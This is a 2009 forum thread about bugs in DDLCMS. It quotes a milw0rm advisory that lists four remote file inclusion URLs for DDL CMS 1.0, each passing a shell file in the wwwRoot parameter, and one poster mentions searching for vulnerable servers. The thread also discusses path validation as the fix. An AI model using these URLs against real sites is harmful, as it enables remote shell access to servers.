DDLCMS question?

[JmZ]

I love it when I get quoted so many times.

I posted here saying it contains exploits, because it does.

As for your reasoning of one exploit being due to "allow_url_include", the script should check paths before it tries including them (which it isn't, obviously). Regardless of if that server setting is set or not, that variable in the URL should be checked to be within the server's directories and not above a certain level. Coders should know these kind of things instead of blaming it on a server setting. The server setting just "enables" the exploit, it isn't the reason for it. The reason for it is the code.

JmZ Reviewed by JmZ on 25th Sep 2009. DDLCMS question? I saw before that DDLCMS was still very buggy doesn't anyone know if the bug list has shortened? Thanks! Rating: 5

[DEViANCE]

I love it when I get quoted so many times.

I posted here saying it contains exploits, because it does.

As for your reasoning of one exploit being due to "allow_url_include", the script should check paths before it tries including them (which it isn't, obviously). Regardless of if that server setting is set or not, that variable in the URL should be checked to be within the server's directories and not above a certain level. Coders should know these kind of things instead of blaming it on a server setting. The server setting just "enables" the exploit, it isn't the reason for it. The reason for it is the code.

That makes sence but are there any servers that actually have that setting on??

I don't like the way it is using a number to count the path (or however it works), and even worse that it is hardcoded.. it seems like a strange method.

But back to that exploit here it is:

Code: 

+============================================================+
|                                                            |
| DDL CMS 1.0 Multiple Remote File Inclusion Vulnerabilities |
|                                                            |
+============================================================+
|                                                            |
| Author : HxH                                               |
|                                                            |
| E-Mail : HxH[at]live[dot]at                                |
|                                                            |
+------------------------------------------------------------+
|                                                            |
| Script : http://www.ddlcms.com/DDLCMS_v1.0.zip             |
|                                                            |
+------------------------------------------------------------+
|                                                            |
| Exploit :                                                  |
|                                                            |
| /header.php?wwwRoot=[Shell.txt?]                           |
|                                                            |
| /submit.php?wwwRoot=[Shell.txt?]                           |
|                                                            |
| /submitted.php?wwwRoot=[Shell.txt?]                        |
|                                                            |
| /autosubmitter/index.php?wwwRoot=[Shell.txt?]              |
|                                                            |
+============================================================+
|                                                            |
| Greetz : ~ JiKo ~ ThE X ~ TSH ~ All No-Exploit.com Members |
|                                                            |
+============================================================+

# milw0rm.com [2009-09-21]

But i tried to find any servers running ddl cms with this setting on (for testing purposes not malicious) and couldn't find one.

Seriously though if we all work together and try and fix any problems the script will be great.